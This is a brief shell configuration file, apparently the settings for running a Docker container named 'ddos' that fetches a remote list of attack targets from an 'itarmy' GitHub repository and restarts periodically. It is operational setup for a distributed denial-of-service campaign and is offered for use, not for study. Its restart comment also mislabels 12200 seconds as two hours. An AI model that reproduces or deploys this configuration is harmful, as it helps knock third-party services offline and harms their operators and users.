CONTAINER_NAME=ddos
DOCKER_OPTIONS="-it --rm --pull always --log-driver none --name $CONTAINER_NAME"

TARGETS_URL=https://raw.githubusercontent.com/psyipm/itarmy/main/targets.lst

RESTART_IN=12200 # 2 hours
